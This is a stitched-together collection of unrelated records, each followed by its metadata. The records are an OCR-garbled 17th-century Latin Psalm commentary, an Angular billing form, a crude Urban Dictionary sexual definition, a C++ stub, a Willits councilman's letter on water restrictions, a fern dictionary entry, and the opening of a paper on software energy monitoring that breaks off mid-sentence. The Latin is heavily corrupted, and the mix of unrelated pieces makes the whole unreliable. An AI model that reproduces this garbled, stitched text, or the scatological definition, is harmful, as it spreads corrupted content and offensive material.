eft;canticum. 44 facie, id eftmetu,feu I proptie. V.2- Quid, Hier.quare ;Chald.quàm, Veg fnime mes. pro , de anima mea , id eft , de me , fic Genefis2o. Hebraice,dices mihi ( pro de me )quàd frater tuus (im, . ANoneff falu: , &c. qua(i dicat, non liberabitur à Deo. Eiur, Hic Hebraice , additur Sclah, id e(t, cleuatio, fcili- cet hic cantores vocem intendebant ad exprimendam rei indignitatem, feu calamitatem , quafi dicat, ó grauem cae lamitatem ! Septuaginta , Af fusa, id eft; pallendi in- |rum contriuiti, 9. Domini cft falus : & fuper populum tuum benediáio tua. |. CJ Fr V4. Tu antem.qua(i dicat,clmtamen tu fis. Sufzepter, idet, prote&or, Gloria fcilicet de cuius protc&ione glo- rior. Exaltans quafi dicat,moe (tum Lecificans;(eu hi a. tumexaltans V. 5. Clamani. Hieronym. clamabo, fcilicet implorans. | Chaldaicé, orabo. Ex«udiuit, Hieronym. exaudiet. 4fen- | re ícilicet Sion,vel czlo..5wo, & hic additur Hebraice, Se- | lah; quafi dicat , óÓrem Deoacceptam, ipfum cum fiducia | inuocare ! |. V. 6. Demini. (cilicet incruce praterita pro futaris,He- braicé, accubui. Soparatu: fum, Hebraice, dormiui. Exwr- rexi y fcilicet tertia die, Hieronym. euigilaui, Swfcepir, Se- | ptuaginta,fufzipiet. Hieron. fu(tentabit, Exarge;quafi di- | cat Áge verà. V.8.PercuffifH.id eft, percutere foles, V.9 Demini.pro:à Domino, Benedi£Eio,id eft. fauor. Ta, & hic additurSclah,quafi dicat,ó Dei bonitatem! recuallum. Hieronym. vertir, femper quafidicat, remef. ^ D fe petpetuo cogitandam ,aut duraturam , aut quz fcmper | j fiat, varié enim pto loco & rc jncelligeadum;idque vel af- | firmando,vel optando , ponitur haec vox folüm in P(almis; & in Cantico Habacuc. MENOCHIV S. | Verf. oO multiplicat; funt, Quztitur hoftium nu« | 2. merum auctumelfz; nam & habetur locoindi- IN PSALMVM IIL zl cato num.r5. 7orecerde vniner fus Ifrael fequebatur Ab[a« VA | ltas intelligit qui fere vmiuerfi erant cum Abfalom. Chri- lom, Idem accidit Chrifto,qui omnium ordinum homifies adueríarius patlus eít, Hebrzos, & Gentiles ,lacros & profinos, Kc, V.3.M alti dicunt. Anime mee &c.multi mihi,vcl deani- ma,vitaque mea,de me loquentes dicunt, &c.Bellarm pu- tat hoc eciam referri polle ad internascentationes,dzmo- neinterius f(aggerente cogitationes difide nz, | ANonefl falus spfi in Deocinis nonillumnuabit, aut eri- pict Deus. Hic in texcu Hebrzo additur vox na felab quam aliqui putant fignificare elenationem , quod fcilicec hinc cantores vocem intenderent ad exprimendam rei in- dignitatem, feucalamitatern, quafi dicat, O grauem cala- mitaté, npe Theodotio.& Symmachus 4fg da ax iiterpretantur,hoc cít,Pfallendi fnteruall«m, Aquila ver- Ut du femper , vt etiam Chaldzus , quod D. Hietonym. probat Epiftola ad Marcellam.Ali; putant hanc notam ad- Icribi,cum fententiz, rhythmi,aut petfonz mutatio indu- citat , aut cum chori przfc&tus , reliquam Plmi partea alterum chorum cancte iubet. Probabilior cxteris videtur D Hieronymi fententia;nam aliis interpretationibus,quo- modo locus effe poteít , cum fela ponitur , vt fit nonnun- quam,in fine Palmi? V.4-Sufceptar meus.in Hcbr.eftclypeni mex; TuDomi- nc me protegendum (afcepitti contrahoftium tela. Gleria mea. caufa gloriz mez. Exaltans caput meum. e.igens caput meum;qui eorum ;babituseft,quibus re« profpere fuccedunt. V. s. De monte (antls fso.de calo fublimi,& alto andi- tati eius dicato,de fublimithrono gloriz (uz; czlum enim ab Apoftolo ad Hebr. 12 vocatur monsSion , & Ierufa- llemc:zleitis, Vel, de monteSien »in quo crat propitiato- | rtum,& arca in tentotioibià Dauide conftructo,vt habe- mtus r.Par 1$ V.6.Dormisi c faporatus f'am.quialatebam fub alisdi- uinzprotedtionis,nos rimut/fed quieto , & fedato animo fui. Timor, & (olicitudo fomnum mihi non abftulerunt. Vel fenfus eftlacut quodammodo quafi oppre(lus effer, & inimicis cederem Hxc oprimé Chrifto conueniunt;qui obdormiuit in Cruce, & in fepulchro. Exurrexi.inhoftes me perfequentes, Vel,(i de Chrifto explicemus,à morte furrexi. Quia Dominu: [n[cepit me. Dominus adiuuit me , vide dicla num.3.Bene hzc Chrifto conucniunt,qui non huma- no fretus auxilio (urrexità mortuis , (edinnixus potentia infinita diuinitatis. V. 7. Non timebo millia populi, &c.millia populi,Irac- | PSALMVS SYNOPSIS x3 C alios omnes , vt Deum ex animo colant, ftohzc conueniuntquem multa populi millia poftulacunt 1d necem, Exurge Domite, ita didum, quafi Dominus iaceret, fe- gaisquodammodo cifctnec quidquam opis afferret. V.8. d duer (ntes mibi fine caufa qui me tihil cale meri- tum pe: fequuntur. Dentes peccatorum,corum vim,quamad me perdendum exercebant, V. 9. Domini eff [alu , &c,id et, Domini cft faluare, & bencdicere populofuo. Benedictio autem fanorem , & bonoramcopiam fignificat. .TIRINVS Verf. N? eft falus ipfi in Deo] Hcbraic additur /z- i ; Ia , quz cantoribus eft het& filentij , vt obrei grauitatem interquiefcan: notiibil quafi meditabundi, & ficaccentionerm excitent ad rem tantam. fanétus Hie- ronymus, Aquila & Chaldzus vertunt » femper , fupple, falus erit in Deo. Vulc ergo infinuare Dauid, intolerabi- lem effc blafphemiam,dfhderc de diuina prouidentia, quz femper adeft. V.4. Tu fees ian Hebraice & Chaldaice,clypens &irea mc, quafi dicat. Protector, adiutor, (uftencator m hi €5. Siccnim etiam verlu 6. & alibiin Scripturis víurpatur Fifaspere. E: gloria mea, fcilicet actiua ,tues ,id cft; glorificas me, regiam gloriam meam coníeruans »Ornans &augens, Er exalrans,id eft, erigens & fuftenta ns,CAput menm, ne pon- deti afflictionisfuccumbam,ita Eufebius. V. g. De monte fanéLo fuo , Son fcilicet, & tabernacu- bie Dauidemibi ere&o,vbi Deus habitare videbatur, & inde orantes exaudite;ita Theodorctus.Echic quoque ad- ditur fela , dc quo verfu 3. fan&us Athanafius exponit de czlo & (ublimi thronoglotiz (ua examdimir me. (ubmite tendo mihi auxilium. V.6. Ego dormini, cin&us licet innumeris hoftibus , ta« men dc Dei ope fecurus , fuauiter in vtramqueaurem dor- miai,& finito fomno,illzfus ferexi;ita Thcodorctus, AL- legoricé , Chriftus perfunctus (omno mortis in cruce , (ure rexit die tertia ilicis "ita Origenes, Eufebius, Dydimus, & Miffile Rominum. E V. 9. Domini eft (alus,d eft.(aluare : e Benedi io id et, benedicere , impendendocui vult fauorem , opem , & co- piam omniumbonorum. G*) G' G M.) I V. xe | [ ] Ortatur boc Pfalmo Dauid tum focios [uos qui fugientem à facie. Abfalom comitabantur , tum hofles sos, co pacem ac rerum omnium copiam fperent. Allcgoricé, | Chrifius Cf Ecclefia hortatur filios [uos ad firmam [Dum c con/lantiam im afJlicfione. 1. In finem in carminibus , Pfalmus Dauid. g Vminuocarem exaudiuit me Dcusiuftitiz mez : in tribulatione dilatafti mihi. Mi- ME? fcrcremci, & exaudi orationem mcam. 5. Filij hominum vfqucquó graui corde ? vt ? quid diligitis vanitatem , & quaritismendacium ? 4. Et ícitote quoniam mirifi- X cauit Dominus fanctum fuum : Dominus exaudict me cüm clamaucro ad cum, 5$. * Irafcimini , & nolite peccare: qua dicitis incordibus veftris , in cubilibus vc- ftris compungimini. 6. Sacrificatc facrificium iuftitie , & fperate in Domino, |£5.«f:6 | multi dicunt : Quis oftendit nobisbona? 7. Signatumeft (uper noslumen vultus tui Domine: dedifti lztitiam in corde mco. 8. A fru&u frumenti, vini & olei fui, multiplicatifunt, 9. In pace inidipfum dormiam, & requiefcam: 10. quoniam tu Dominc fingulariter in fpc con(tituifti me. E Tomus 2. Voduj ! 236 BIBLIA ANNOTATIONVM ———— f i Verf (C 7 P minuocarem exaudiuit me Dewa vfhitie mee , | L im tribu'atione dilat e[Hi mibi. Quod dicitur, Deus | iufliti a mee, obícurum eít,& varié fuppleri peteft. Velhoc modo : Deus , qui eft author iuftitiz mez ; vel ;ceftisiu- flitiz mez contra meos calumniatores ; wel denique vin» dex uftiuiz mez., aduerfus perfecutores- Porró quod ad- jungitur. Iniribulatione dilatafti mibi, Sepcuaginta habent | per accufatidum cafum, dilata[H m, Et fic legit quoque | eccle(ia fetia 3. poft 1. Dom. ide n aia Commu- ; nionem. Vtroque modo verti poteftex Hebr. Silegitur | (mibi). fübinrelhgitur viam meam , vel aliquid fimile. | ; Latitudo autem in fcripturis, modocharitatem , modo | | lztitiam, modo capacitatem fignificat. Charitatem , vt |! Pl. 118. jam mandates um tuorum cncurri cum dilatafPi | cor meum , Videlicet charitate. Ita & capacitatem figmfi- | | eat , quando dicit fcriptura 3. Reg. 4. Deum dediffe Salo- | monilatitudinem cordis ideft, maximz fapientizcapam! ! cemfecifle. Denique lztitiam Ifaye 6o. 7ne MM ] fits, marabitr et dilatabitur cor tuum cc. Et hoc modo. | hic accipitur; vt fenfusfit. Cum cflem in tribulatione po- ' | fitus ,lztificafti me gaudio interiori , & confolationc d'- | latafti, Vide ctiam 2. Corinth. 6. i || Ves. Jraírimini cx nelite peccare. Ac fidicat : Quod fi! ESTIVS * ; ampliüsin me peccetis. Qua dicitis, &c. q.d. corum, quz |ma cogitaftis peniteat vos , cum foli eftis in cubiculis. | Chald. orate in corde veftro, & fuper cubile veítrum. Compungimini. Chald. mementote diei mortis. Hier. ta- | cete & hic Hebt.additur Sélah. | | Vo6agpaerificate , c. Chald. domate concupilcentiss veflras , & reputabitur vobis ficut facrificium tuftitiz. Juflitia. q. d. offerte facrificia operum bonorum; vel cum iufticia , & fanclitate. Sperate. Hier. confidite. Bona. q.d. voinamaliquisnob:s przftet diuitias, vel quo- modo cognofcemus vera bona ? V^ 7. Signatum , &c. q.d cüm tamen vera diuitiz (int | lumen tuum, feugratia , vel, cuum nobis lumen oftendit, quz fint verab ona. Hier, leua fapernos lumen vultistui. B q.d.lucido (eu hilari vultu nos afpice. fcilicet , folet quis amorem hilari vultu oftendete ,cotuo iam, Qydiffi. pro, foles dare. fcilicet, eo lumine. V.8. 4 frulis. pto, Fru&u. Aaltiplicati, id cft locuple- tati, fcilicet, terreni homines. V. 9. /n pace.q.d. cgo vetóin pace. /nidipfum. ideft, fi. mul , feu paritet-—Singulariter. id. ít , fingulari ratione, | Hier.fpecialiter. Spe. Chald. tecuzitate, ConflirurfHi. Hier. | habitare fecifti. Chald. (edere facies. | common_corpus | {'identifier': 'bub_gb_8VWTBszLYe4C_28', 'collection': 'Latin-PD', 'open_type': 'Open Culture', 'license': 'Public Domain', 'date': '1643.0', 'title': 'Biblia magna commentariorum literalium. Ioannis Gagnaei, doct. paris. Guillelmi Estij, doct. duacensis, Emmanuelis Sa, Ioannis Menochij, & Iacobi Tirini Societ. Iesu. Adeò eruditè & integrè sacram scripturam exponentium, vt quae in vno, quoad sensum & varias versiones possent desiderari, in alio reperiantur. Prolegomenis, chr', 'creator': 'None', 'language': 'Latin', 'language_type': 'Spoken', 'word_count': '7445', 'token_count': '17267', '__index_level_0__': '4211', 'original_id': 'e849e0caff5a67b72610975e617747100d2b5ae2b681beb9e3b0f907a0e82bdb'} |
<form name="form" class="form-horizontal" #myFormB="ngForm">
<div class="row">
<!-- Column -->
<div class="col-md-10">
<div class="form-group">
<label class="col-md-4 control-label" for="domicil">{{ 'FORM_FIELD.DOMICIL' | getText }}</label>
<div class="col-md-8">
<input type="text" id="domicil" class="form-control" name="domicil" required
[(ngModel)]="billing.domicil" maxlength="24"/>
</div>
</div>
<div class="form-group">
<label class="col-md-4 control-label" for="code_bic">BIC</label>
<div class="col-md-8">
<input type="text" id="code_bic" class="form-control" name="code_bic" required
[(ngModel)]="billing.bic" maxlength="11"/>
</div>
</div>
<div class="form-group">
<label class="col-md-4 control-label" for="code_iban">IBAN</label>
<div class="col-md-8">
<input type="text" id="code_iban" class="form-control" name="code_iban" required
[(ngModel)]="billing.iban" maxlength="34"/>
</div>
</div>
<div class="form-group">
<label class="col-md-4 control-label" for="inputAddress">{{ 'FORM_FIELD.ADDRESS' | getText }}</label>
<div class="col-md-8">
<textarea id="inputAddress" class="form-control" name="address" rows="5" style="resize:none" required
[(ngModel)]="billing.address"></textarea>
</div>
</div>
<div class="separator top"></div>
<div class="form-group">
<label class="col-md-4 control-label"></label>
<div class="form-actions col-md-8">
<button *ngIf="!loading" class="btn btn-primary col-md-12"
[disabled]="myFormB.form.pristine || !myFormB.form.valid"
(click)="update();myFormB.form.markAsPristine()">
<i class="fa fa-check"></i> {{ 'FORM_FIELD.BTN_SAVE' | getText }}
</button>
<button *ngIf="loading" class="btn btn-primary col-md-12" disabled>
<i class="fa fa-refresh fa-spin"></i> {{ 'FORM_FIELD.BTN_SAVING' | getText }}
</button>
</div>
</div>
</div>
<!-- // Column END -->
</div>
</form> | the_stack | {'hexsha': 'ae0973253b94997726ce19e720e80a89d0d82775', 'size': '2072', 'ext': 'html', 'lang': 'HTML', 'max_stars_repo_path': 'app/account/forms/form-billing.component.html', 'max_stars_repo_name': 'cgerinte/angular2-testing', 'max_stars_repo_head_hexsha': '3c2fd7301ff468f1fe580c0085760e666dbca73c', 'max_stars_repo_licenses': "['MIT']", 'max_stars_count': '', 'max_stars_repo_stars_event_min_datetime': '', 'max_stars_repo_stars_event_max_datetime': '', 'max_issues_repo_path': 'app/account/forms/form-billing.component.html', 'max_issues_repo_name': 'cgerinte/angular2-testing', 'max_issues_repo_head_hexsha': '3c2fd7301ff468f1fe580c0085760e666dbca73c', 'max_issues_repo_licenses': "['MIT']", 'max_issues_count': '', 'max_issues_repo_issues_event_min_datetime': '', 'max_issues_repo_issues_event_max_datetime': '', 'max_forks_repo_path': 'app/account/forms/form-billing.component.html', 'max_forks_repo_name': 'cgerinte/angular2-testing', 'max_forks_repo_head_hexsha': '3c2fd7301ff468f1fe580c0085760e666dbca73c', 'max_forks_repo_licenses': "['MIT']", 'max_forks_count': '', 'max_forks_repo_forks_event_min_datetime': '', 'max_forks_repo_forks_event_max_datetime': '', 'avg_line_length': '31.3939393939', 'max_line_length': '106', 'alphanum_fraction': '0.597007722', 'original_id': '9d807f46def86a618943762e4ab61f6bab004bdef343d92fa25a111617ed0548'} |
Top Definition
First, you have to wait until this person has to take a massive shit, then you put your lips gently on the anus of a male or female and start out slowly sucking and after ten seconds, piss in the anus of that person. Then put your lips back on that person and suck fastly until the person pushes the piss and shit all over your face.
Boy: I just gave my girlfiend an Indiana Ass Plunge!
Friend: Gay.
Boy: No it wasn't, she seemed to like it!
Friend: Probably because you were her first.
Boy: Yeah, you're right...
ayon kay Ass Snatch ika-09 ng Nobyembre, 2012
Libreng Koreo Araw- araw
| dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '12', 'language_id_whole_page_fasttext': "{'en': 0.828278660774231}", 'metadata': "{'Content-Length': '45822', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:VERUTD7GTKDLQCZL2MCIH4WLMVZAJPBE', 'WARC-Concurrent-To': '<urn:uuid:3e62389a-53d8-4627-b003-319356249ae1>', 'WARC-Date': datetime.datetime(2015, 3, 1, 7, 5, 53), 'WARC-IP-Address': '23.235.46.207', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:B4WOEPYWIZUXEFC7AT4DLCVOEESC34KX', 'WARC-Record-ID': '<urn:uuid:29053b9c-2794-4dfd-adb1-f53eda23c32a>', 'WARC-Target-URI': 'http://tl.urbandictionary.com/define.php?term=Indiana%20Ass%20Plunge', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:3c9fd5ef-38eb-4eee-bf2e-001bc8e966df>', 'WARC-Truncated': None}", 'previous_word_count': '146', 'url': 'http://tl.urbandictionary.com/define.php?term=Indiana%20Ass%20Plunge', 'warcinfo': 'robots: classic\r\nhostname: ip-10-28-5-156.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-11\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for February 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.10324078798294067', 'original_id': '774e4473cb15291cfbe7b5d646d016c16a7751c896604256b315d436ad1ff9fd'} |
class FailedSpace;
template <>
class Storage<FailedSpace> {
public:
typedef struct mozart::unit_t Type;
};
| mini_pile | {'original_id': '6fe528a4e93490a2d72aebf9e5c6096abf470d3198917d9469681851b1c7dae8'} |
To the editor:
Last week, The Willits News and the Willits Weekly reported that the City Council had voted to relax the restrictions on water use. Because of the long term drought that we are experiencing, the City Council had declared a water emergency limiting the amount of water that could be used by households and businesses. But with the recent rainfall, the City Council voted to increase the amount of water that could be used. The vote was 4-1 to relax the restrictions, and The Willits News reported that I was the lone vote against.
All of the above, and what was reported in the local newspapers, is, of course, true!
True, but incomplete! What was missing was the why: why did I vote against relaxing the water restrictions?
At the time of the vote, I gave a very clear explanation of why I intended to vote the way I did, because the public has a right to know why their City Council members take the actions that they do. Those of you who were sitting in the council chambers or watching the meeting on local cable TV, heard first hand what I had to say, and were able to form your own opinions about my position. But for those who weren”t in the council chambers or watching on the other end of the TV broadcast, and unfortunately that was probably a large majority of you, the only way for you to find out what happened is to read it in the newspapers. So because of that, it”s very important for the newspapers to get it right and complete.
Ordinarily, I wouldn”t bother to write this letter to present the facts and to clear up any misunderstandings, but because I have been getting some questions about why I want to “deprive” our water users, I decided that the reasons I stated at the meeting, that weren”t reported in the news stories, should be repeated for your information.
At the Council meeting, city staff reported that the reservoirs are full, and at the time of the meeting, we had received only about 60 percent of our normal rainfall, and it is unknown when and how much rain will fall in the future. In fact, NOAA has reported that the rainfall has pretty much ended for the season, and there is no way to know if we will have a repeat of the dry weather that we had last fall.
I asked our city water people about the significance of having full reservoirs with less than normal rainfall. Why did it matter, and why should that make a difference about whether or not to relax the water restrictions? Weren”t full reservoirs enough?
Apparently, it”s not! The water that”s in the reservoirs is all that we have in storage, and if it doesn”t rain any more, they don”t get refilled. However, I was told, there”s a spring located at the top of the water shed, and that spring continues to refill the reservoir, so as water is pumped out of the reservoir, the spring recharges it. The problem is, without the late spring rains, the spring itself doesn”t get recharged, and there is no water for it to send to the reservoir. Without this recharging from the spring, we could very well run very low on water in late summer, and without our normal rainfall in the Autumn, we could easily be in the same situation that we were in last year.
I don”t know about you, but I don”t relish going through this emergency exercise and rationing every year!
The city is currently installing an emergency water system that would use water from wells in the valley. Many of the components are installed, but there still needs to be more work done before the system can come on line. It”s hoped, and expected, that this water system should provide enough backup to avoid having to impose the restrictions that we have currently relaxed, and to avoid actually running out of water. You may recall that we were only 100 days away from that happening a few months ago, before it rained.
But in my opinion, until this new system is completed and brought on line, combined with the still uncertain and unencouraging long range forecasts, we still have a water problem. It is hoped that in the coming months the public will continue to conserve water, as you have been doing, but it”s fairly certain that more water will be used than has been used since the water restrictions were imposed. And once that water is gone, it”s gone, and it ain”t coming back! I felt then, and I still believe, that until we have a safe, reliable water supply in place, we can”t afford to relax. And that”s why I voted not to relax the restrictions.
I”m not trying to punish anyone, or deny anyone their basic rights; I just want to make certain that we can continue to provide you with water. And in case anyone is wondering, any restrictions that were imposed on water users were also imposed on all of the City Council members. We”re all in this together.
Ron Orenstein, Willits city councilman | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.9839901328086852}", 'metadata': "{'Content-Length': '124859', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:74TTQXYTA6H6CM3YC6PITRMBBP2DRT77', 'WARC-Concurrent-To': '<urn:uuid:6cf91c97-a8d2-471e-a3c5-a1d3e8a07583>', 'WARC-Date': datetime.datetime(2019, 3, 22, 22, 50, 45), 'WARC-IP-Address': '192.0.66.2', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:UCEY2SBRUS6FX366C7XZJ3A3ZLARC5WA', 'WARC-Record-ID': '<urn:uuid:39d65f29-ce65-4a1a-92e9-7e212c6ff12b>', 'WARC-Target-URI': 'https://www.willitsnews.com/2014/04/25/letter-why-i-voted-to-keep-the-restrictions-on-water-use/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:dfe17d9a-d73e-4b14-9fe3-8de687aabc27>', 'WARC-Truncated': None}", 'previous_word_count': '869', 'url': 'https://www.willitsnews.com/2014/04/25/letter-why-i-voted-to-keep-the-restrictions-on-water-use/', 'warcinfo': 'isPartOf: CC-MAIN-2019-13\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for March 2019\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-140-246-66.ec2.internal\r\nsoftware: Apache Nutch 1.15 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 0.11-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.051720619201660156', 'original_id': 'a605c82efdd610f82964b0c6318f16b1b65b8b3e9c3bbfb072fc163af6d22c90'} |
Skip to definition.
Noun: southwestern lip fern
1. Lip fern of Texas to Oklahoma and Colorado and Arizona and Mexico having tall erect tufted fronds
- Cheilanthes eatonii
Derived forms: southwestern lip ferns
Type of: lip fern, lipfern | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '10', 'language_id_whole_page_fasttext': "{'en': 0.7900448441505432}", 'metadata': "{'Content-Length': '7386', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:WXUMNRFNC3GGGJUF3UPW2FDCT5ZTNVM5', 'WARC-Concurrent-To': '<urn:uuid:64b891d5-bbad-4359-b3ad-a720e980bbb7>', 'WARC-Date': datetime.datetime(2015, 1, 25, 4, 1, 53), 'WARC-IP-Address': '216.92.104.49', 'WARC-Identified-Payload-Type': None, 'WARC-Payload-Digest': 'sha1:ZHFWEEYYCMJP6HTL7BFJZUT7EEYU3HHQ', 'WARC-Record-ID': '<urn:uuid:10d11fbf-b179-43bf-aee2-cd091100d69e>', 'WARC-Target-URI': 'http://www.wordwebonline.com/en/SOUTHWESTERNLIPFERN', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:c5d18a81-9aac-4f07-926d-1bf7726a467c>', 'WARC-Truncated': 'length'}", 'previous_word_count': '51', 'url': 'http://www.wordwebonline.com/en/SOUTHWESTERNLIPFERN', 'warcinfo': 'robots: classic\r\nhostname: ip-10-180-212-252.ec2.internal\r\nsoftware: Nutch 1.6 (CC)/CC WarcExport 1.0\r\nisPartOf: CC-MAIN-2015-06\r\noperator: CommonCrawl Admin\r\ndescription: Wide crawl of the web with URLs provided by Blekko for January 2015\r\npublisher: CommonCrawl\r\nformat: WARC File Format 1.0\r\nconformsTo: http://bibnum.bnf.fr/WARC/WARC_ISO_28500_version1_latestdraft.pdf', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.1425575613975525', 'original_id': '241c73e338961954494db4be0aa227ddd2d8c6185c67a1757d21224f94933d32'} |
A Preliminary Study of the Impact of Software Engineering on GreenIT
Adel Noureddine1,2, Aurelien Bourdon1,2, Romain Rouvoy1,2, Lionel Seinturier1,2,3 1 Inria Lille – Nord Europe 2 University Lille 1 - LIFL CNRS UMR 8022, France 3 Institut Universitaire de France firstname.lastname@inria.fr
Abstract—GreenIT has emerged as a discipline concerned with the optimization of software solutions with regards to their energy consumption. In this domain, most of state-of-the-art solutions offer limited or constraining approaches to monitor the energy consumption of a device or a process. In this paper, we therefore report on a runtime energy monitoring framework we developed to easily report on the energy consumption of system processes. Concretely, our approach adopts an OSlevel library, called P OWER API, which estimates the power consumption of processes according to different dimensions (CPU, network, etc.). In order to better understand potential energy leaks of legacy software, we use this library to study the impact of programming languages and algorithmic choices on the energy consumption. This preliminary study is based on an empirical evaluation of a eight implementations of the Towers of Hanoi problem. Keywords-Performance; Measurement; Energy; Power Model; Monitoring Experimentation; I.
I NT
RODUC
TION
Energy-aware software solutions and approaches are becoming broadly available, as energy concerns are becoming mainstream. The increasing usage of computers and other electronic devices (e.g., smartphones, sensors) is continuously impacting our overall energy consumption. Information and Communications Technology (ICT) accounted for 2% of global carbon emissions in 2007 [1] or 830 M tCO2 e [2], and is expected to grow to 1,430 M tCO2 e in 2020 [2]. These values illustrate the opportunities for efficient ICT solutions to reduce carbon emissions and energy consumption. Rising energy costs in computers and mobile devices implies the optimization and the adaptation of computer systems. In this domain, research in GreenIT already proposes various approaches aiming at achieving energy savings in computers and software. In particular, monitoring the energy consumption of the system is a requirement to achieve such savings. However, most of the state-of-the-art approaches either focus on the hardware [3], or offer coarse-grained energy feedbacks of software [4], [5]. In this paper, we therefore propose to gather applications energy feedback information at runtime and with similar accuracy as hardware equipments while using only a software approach. Our approach consists of a system monitoring library (at the operating system level), called P OWER API. P OWER API estimates the energy consumption of running processes, in real-time, based on raw information collected from hardware devices (e.g., CPU, network card) through the operating system. We use both state-of-the-art energy models and propose new models to compute the energy consumption of software. Using this monitoring framework, we compare the energy footprint of eight implementations of the Towers of Hanoi program. Our preliminary results demonstrate that we can clearly observe the impact of different implementations of algorithms on the energy consumption, thus providing the opportunity at a later stage to reduce their energy footprint. The remainder of this paper is organized as follows. In Section II, we describe our motivations and the main challenges we tackle. Section III describes our approach, the design of our proposed architecture and our energy models. Section IV details the implementation and validation of our prototype. In Section V, we report and discuss the preliminary results we obtained from comparing the Towers of Hanoi implementations. Related work is discussed in Section VI, while we conclude in Section VII. II. M OTIVATION AND C HALLENGES
According to [6], ICT consumes up to 7% of global power consumption (or 168 GW) in 2008. This number is predicted to grow and double to 433 GW in 2020 or more than 14.5% of worldwide power consumption [6]. With the rise of ICT power consumption, power-aware optimizations and management cannot be done efficiently without accurate power measurements. In particular, we argue that monitoring the power consumption of applications (and not only hardware) has become a requirement for power-aware Software as a Service (SaaS) and power-aware software adaptation. Hardware monitoring is usually achieved through additional hardware measurement equipments, such as multimeters or specialized integrated circuits (cf. Section VI). This approach offers a precise and accurate measurement of the energy consumption of hardware components, but at the cost of an additional investment. Furthermore, it cannot monitor the energy consumption of software components and running applications. We rather believe that a scalable approach can be achieved by a software-centric approach. Monitoring the energy con- sumption of software has to yield many challenges in order to build an accurate software-centric approach. In particular, the biggest problem that software monitoring tools face is providing accurate estimations of energy consumption based on collected raw information. Unlike hardware measurements, software approaches use energy models in order to provide an estimation of the energy consumption of software components. However, these estimations tend to have different degrees of accuracy and overhead. In addition to accuracy, the overhead of the monitoring platform is to be optimized in order to limit its impact. The overhead depends both on the degree of accuracy needed and on the cost of the monitoring tool and the monitored applications. This leads to a difficult tradeoff between the accuracy requirements and the cost of the software monitoring tool. Laying these challenges, we propose in the next section an approach named P OWER API for monitoring applications and processes at runtime.
III. P OWER API D ESIGN AND A PPROACH
In this section, we present the P OWER API general architecture and we describe the approach we use for defining our energy models. The architecture is based on a modular approach, mixing power monitoring tools with energy models in order to provide energy information of software.
A. Architecture
P OWER API architecture is a modular architecture built for agile software programming. The core of the architecture are power modules. P OWER API is constructed as separate modules that can be started or stopped at runtime upon needs. A set of OS-dependent sensor modules (e.g., CPU, network) collect raw information about hardware resource utilization, either directly from the devices or through the operating system. This information is then exposed to another set of OS-independent formula modules that use our power models (cf. Section III-B) to compute the power consumption of each hardware component. These modules also compute the power consumption of running processes and applications per hardware resource. A local database is also used to store configurations about the hardware resources and used to auto-calibrate P OWER API depending on the environment. Finally, all these modules are managed by a life cycle module. The latter allows to start, stop, add, remove or modify modules depending on monitoring needs and commands sent by applications. Figure 1 depicts the overall architecture of P OWER API.
B. Power Models
We propose a comprehensive energy model using our own proposed formulae and formulae taken from the state-of-the- Figure 1. P OWER API Reference Architecture. art. In [7], the energy cost of software is computed based on the following formula: Esof tware = Ecomp + Ecom + Einf ra where Ecomp is the computational cost (i.e., CPU processing, memory access, I/O operations), Ecom is the cost of exchanging data over the network, and Einf ra is the additional cost incurred by the OS and runtime platform (e.g., Java VM). We base our model on a similar principle, taking into account the modular aspect of the power calculation (e.g., the sum of the power consumption of different hardware components). Infrastructure power is included in the computational cost of our power models and in our prototype. From this, we can abstract our global power formula as follows: Psof tware = Pcomp + Pcom (1) At this stage, we developed two models, one for CPU computational costs and one for network communication costs. Pcomp is therefore equal to the CPU power consumed by software, and Pcom is equal to the power consumed by the network card for transmitting software’s data. Next, we will detail the CPU and network energy models we use in P OWER API. 1) CPU Model:
The CPU power consumed by a specific process (in our case we use process P IDs) can be represented as: P ID P ID PCP U (d) = PCP U (d) × UCP U (d) P ID Where PCP U (d) is the CPU power consumed by the specific PID during a given duration d, PCP U (d) is the global CPU P ID power during d and UCP U (d) represents the process CPU usage during d. Thus, our approach is to estimate the power required by the CPU to execute the process PID. This is achieved by computing the CPU percentage usage of the PID by the overall CPU power during a given duration d. Next, we detail our model in order to compute PCP U (d), the P ID global CPU power, and UCP U (d), the process CPU usage. Global CPU power: The overall power consumption for the majority of modern processors (CMOS1 ) follows the standard equation: f,v 2 PCP U =c×f ×V (2) where f is the frequency, V the voltage and c a constant value depending on the hardware materials (such as the capacitance). Power consumption is not always linearly dependent to the percentage of CPU utilization. This is due to DVFS (Dynamic Voltage and Frequency Scaling) and also to the fact that power depends on the voltage (and subsequently the frequency) of the processor. For example, A process at 100% CPU utilization will not necessarily consume more power than a process running at 50% CPU utilization but with a higher voltage. Therefore, a simple CPU utilization profiler is not enough in order to monitor power consumption. Our power model 